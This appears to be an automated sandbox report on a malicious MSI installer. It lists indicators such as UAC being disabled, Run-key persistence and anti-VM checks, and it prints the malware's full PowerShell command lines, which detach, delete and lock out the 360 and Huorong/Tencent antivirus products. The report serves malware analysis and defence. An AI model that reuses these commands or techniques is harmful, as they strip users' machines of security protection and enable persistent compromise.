Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05-09-2024 08:22
Static task
static1
Behavioral task
behavioral1
Sample
2496afe349303f5135b3e82978870b33c9fe5bea6ae494a7bcdd5ae01a0d0544.msi
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2496afe349303f5135b3e82978870b33c9fe5bea6ae494a7bcdd5ae01a0d0544.msi
Resource
win10v2004-20240802-en
General
-
Target
2496afe349303f5135b3e82978870b33c9fe5bea6ae494a7bcdd5ae01a0d0544.msi
-
Size
72.6MB
-
MD5
b93c7a9d3b8ab6939f673c8a316d7fac
-
SHA1
2b900cc34fbc6d28cdcbc91368317b7019735027
-
SHA256
2496afe349303f5135b3e82978870b33c9fe5bea6ae494a7bcdd5ae01a0d0544
-
SHA512
eae37ade54e876f3c28e476a5bd88c0d3678cd73d208eec4b68ba8e1e0738e1620327c82a6d9cc6f773eed85d3dfe9ad317071b29b16821382ee8ccb32650b9c
-
SSDEEP
1572864:WJCqQUW9zp3E8N9yBrJyyEL5OE6q4UxU12xNtkI:2WU8vynyyErxFNr
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" iusb3mon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" iusb3mon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" iusb3mon.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ iusb3mon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs
Run Powershell and hide display window.
pid Process 5360 powershell.exe 5352 powershell.exe 3380 powershell.exe 5128 powershell.exe 5368 powershell.exe 5132 powershell.exe 3340 powershell.exe 4460 powershell.exe 4916 powershell.exe 556 powershell.exe 3508 powershell.exe 3736 powershell.exe 3348 powershell.exe 436 powershell.exe 3340 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion iusb3mon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion iusb3mon.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Wine iusb3mon.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe" iusb3mon.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe" iusb3mon.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe" iusb3mon.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" iusb3mon.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3736 iusb3mon.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files (x86)\My Product\LineInst.exe msiexec.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File opened for modification C:\Windows\Installer\e57fa0f.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIFA7D.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI1549.tmp msiexec.exe File created C:\Windows\Installer\e57fa11.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI1683.tmp msiexec.exe File created C:\Windows\Installer\e57fa0f.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{03D03980-BCD0-46A2-A817-0A2C9A26545D} msiexec.exe -
Executes dropped EXE 3 IoCs
pid Process 2784 un.exe 3736 iusb3mon.exe 3624 LineInst.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 7 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 3348 powershell.exe 4460 powershell.exe 436 powershell.exe 5368 powershell.exe 5132 powershell.exe 3736 powershell.exe 3340 powershell.exe -
Loads dropped DLL 8 IoCs
pid Process 4176 MsiExec.exe 4176 MsiExec.exe 3624 LineInst.exe 3624 LineInst.exe 3624 LineInst.exe 3624 LineInst.exe 3624 LineInst.exe 3624 LineInst.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 1552 msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 29 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecEdit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecEdit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fltMC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iusb3mon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LineInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecEdit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecEdit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000bf081c85bb6cd1e80000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000bf081c850000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900bf081c85000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dbf081c85000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000bf081c8500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 iusb3mon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz iusb3mon.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4464 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4176 MsiExec.exe 4176 MsiExec.exe 4176 MsiExec.exe 4176 MsiExec.exe 4176 MsiExec.exe 4176 MsiExec.exe 4176 MsiExec.exe 4176 MsiExec.exe 4176 MsiExec.exe 4176 MsiExec.exe 4176 MsiExec.exe 4176 MsiExec.exe 3736 powershell.exe 3736 powershell.exe 3736 powershell.exe 3340 powershell.exe 3340 powershell.exe 3340 powershell.exe 3348 powershell.exe 3348 powershell.exe 3348 powershell.exe 4460 powershell.exe 4460 powershell.exe 4460 powershell.exe 436 powershell.exe 436 powershell.exe 436 powershell.exe 324 msiexec.exe 324 msiexec.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3624 LineInst.exe 3624 LineInst.exe 3624 LineInst.exe 3624 LineInst.exe 3624 LineInst.exe 3624 LineInst.exe 3624 LineInst.exe 3624 LineInst.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3736 iusb3mon.exe 3624 LineInst.exe 3624 LineInst.exe 3508 powershell.exe 3508 powershell.exe 3340 powershell.exe 3340 powershell.exe 556 powershell.exe 556 powershell.exe 4916 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1552 msiexec.exe Token: SeIncreaseQuotaPrivilege 1552 msiexec.exe Token: SeSecurityPrivilege 324 msiexec.exe Token: SeCreateTokenPrivilege 1552 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1552 msiexec.exe Token: SeLockMemoryPrivilege 1552 msiexec.exe Token: SeIncreaseQuotaPrivilege 1552 msiexec.exe Token: SeMachineAccountPrivilege 1552 msiexec.exe Token: SeTcbPrivilege 1552 msiexec.exe Token: SeSecurityPrivilege 1552 msiexec.exe Token: SeTakeOwnershipPrivilege 1552 msiexec.exe Token: SeLoadDriverPrivilege 1552 msiexec.exe Token: SeSystemProfilePrivilege 1552 msiexec.exe Token: SeSystemtimePrivilege 1552 msiexec.exe Token: SeProfSingleProcessPrivilege 1552 msiexec.exe Token: SeIncBasePriorityPrivilege 1552 msiexec.exe Token: SeCreatePagefilePrivilege 1552 msiexec.exe Token: SeCreatePermanentPrivilege 1552 msiexec.exe Token: SeBackupPrivilege 1552 msiexec.exe Token: SeRestorePrivilege 1552 msiexec.exe Token: SeShutdownPrivilege 1552 msiexec.exe Token: SeDebugPrivilege 1552 msiexec.exe Token: SeAuditPrivilege 1552 msiexec.exe Token: SeSystemEnvironmentPrivilege 1552 msiexec.exe Token: SeChangeNotifyPrivilege 1552 msiexec.exe Token: SeRemoteShutdownPrivilege 1552 msiexec.exe Token: SeUndockPrivilege 1552 msiexec.exe Token: SeSyncAgentPrivilege 1552 msiexec.exe Token: SeEnableDelegationPrivilege 1552 msiexec.exe Token: SeManageVolumePrivilege 1552 msiexec.exe Token: SeImpersonatePrivilege 1552 msiexec.exe Token: SeCreateGlobalPrivilege 1552 msiexec.exe Token: SeBackupPrivilege 3008 vssvc.exe Token: SeRestorePrivilege 3008 vssvc.exe Token: SeAuditPrivilege 3008 vssvc.exe Token: SeBackupPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeDebugPrivilege 3736 powershell.exe Token: SeDebugPrivilege 3340 powershell.exe Token: SeDebugPrivilege 3348 powershell.exe Token: SeDebugPrivilege 4460 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe Token: SeRestorePrivilege 324 msiexec.exe Token: SeTakeOwnershipPrivilege 324 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1552 msiexec.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4176 MsiExec.exe 4176 MsiExec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 324 wrote to memory of 4668 324 msiexec.exe 100 PID 324 wrote to memory of 4668 324 msiexec.exe 100 PID 324 wrote to memory of 4176 324 msiexec.exe 102 PID 324 wrote to memory of 4176 324 msiexec.exe 102 PID 324 wrote to memory of 4176 324 msiexec.exe 102 PID 4176 wrote to memory of 4928 4176 MsiExec.exe 103 PID 4176 wrote to memory of 4928 4176 MsiExec.exe 103 PID 4176 wrote to memory of 4928 4176 MsiExec.exe 103 PID 4928 wrote to memory of 4316 4928 cmd.exe 105 PID 4928 wrote to memory of 4316 4928 cmd.exe 105 PID 4928 wrote to memory of 4316 4928 cmd.exe 105 PID 4176 wrote to memory of 3736 4176 MsiExec.exe 106 PID 4176 wrote to memory of 3736 4176 MsiExec.exe 106 PID 4176 wrote to memory of 3736 4176 MsiExec.exe 106 PID 4176 wrote to memory of 3340 4176 MsiExec.exe 108 PID 4176 wrote to memory of 3340 4176 MsiExec.exe 108 PID 4176 wrote to memory of 3340 4176 MsiExec.exe 108 PID 4176 wrote to memory of 3348 4176 MsiExec.exe 110 PID 4176 wrote to memory of 3348 4176 MsiExec.exe 110 PID 4176 wrote to memory of 3348 4176 MsiExec.exe 110 PID 4176 wrote to memory of 4460 4176 MsiExec.exe 112 PID 4176 wrote to memory of 4460 4176 MsiExec.exe 112 PID 4176 wrote to memory of 4460 4176 MsiExec.exe 112 PID 4176 wrote to memory of 436 4176 MsiExec.exe 114 PID 4176 wrote to memory of 436 4176 MsiExec.exe 114 PID 4176 wrote to memory of 436 4176 MsiExec.exe 114 PID 4176 wrote to memory of 2784 4176 MsiExec.exe 116 PID 4176 wrote to memory of 2784 4176 MsiExec.exe 116 PID 4176 wrote to memory of 3736 4176 MsiExec.exe 118 PID 4176 wrote to memory of 3736 4176 MsiExec.exe 118 PID 4176 wrote to memory of 3736 4176 MsiExec.exe 118 PID 324 wrote to memory of 3624 324 msiexec.exe 119 PID 324 wrote to memory of 3624 324 msiexec.exe 119 PID 324 wrote to memory of 3624 324 msiexec.exe 119 PID 3736 wrote to memory of 3508 3736 iusb3mon.exe 120 PID 3736 wrote to memory of 3508 3736 iusb3mon.exe 120 PID 3736 wrote to memory of 3508 3736 iusb3mon.exe 120 PID 3736 wrote to memory of 3340 3736 iusb3mon.exe 121 PID 3736 wrote to memory of 3340 3736 iusb3mon.exe 121 PID 3736 wrote to memory of 3340 3736 iusb3mon.exe 121 PID 3736 wrote to memory of 556 3736 iusb3mon.exe 122 PID 3736 wrote to memory of 556 3736 iusb3mon.exe 122 PID 3736 wrote to memory of 556 3736 iusb3mon.exe 122 PID 3736 wrote to memory of 4916 3736 iusb3mon.exe 123 PID 3736 wrote to memory of 4916 3736 iusb3mon.exe 123 PID 3736 wrote to memory of 4916 3736 iusb3mon.exe 123 PID 3736 wrote to memory of 4184 3736 iusb3mon.exe 126 PID 3736 wrote to memory of 4184 3736 iusb3mon.exe 126 PID 3736 wrote to memory of 4184 3736 iusb3mon.exe 126 PID 3736 wrote to memory of 736 3736 iusb3mon.exe 130 PID 3736 wrote to memory of 736 3736 iusb3mon.exe 130 PID 3736 wrote to memory of 736 3736 iusb3mon.exe 130 PID 3736 wrote to memory of 3452 3736 iusb3mon.exe 132 PID 3736 wrote to memory of 3452 3736 iusb3mon.exe 132 PID 3736 wrote to memory of 3452 3736 iusb3mon.exe 132 PID 4916 wrote to memory of 3840 4916 powershell.exe 134 PID 4916 wrote to memory of 3840 4916 powershell.exe 134 PID 4916 wrote to memory of 3840 4916 powershell.exe 134 PID 556 wrote to memory of 4488 556 powershell.exe 135 PID 556 wrote to memory of 4488 556 powershell.exe 135 PID 556 wrote to memory of 4488 556 powershell.exe 135 PID 3508 wrote to memory of 512 3508 powershell.exe 136 PID 3508 wrote to memory of 512 3508 powershell.exe 136 PID 3508 wrote to memory of 512 3508 powershell.exe 136 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" iusb3mon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" iusb3mon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" iusb3mon.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\2496afe349303f5135b3e82978870b33c9fe5bea6ae494a7bcdd5ae01a0d0544.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1552
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:4668
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AB9C4FC2B3CD74688C8D03B9BBD7718D2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /c "fltmc.exe && exit 0||exit 1"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\SysWOW64\fltMC.exefltmc.exe4⤵
- System Location Discovery: System Language Discovery
PID:4316
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}3⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}3⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match 'ÌÚѶµçÄԹܼÒ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach TFsFlt $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}3⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3348
-
-
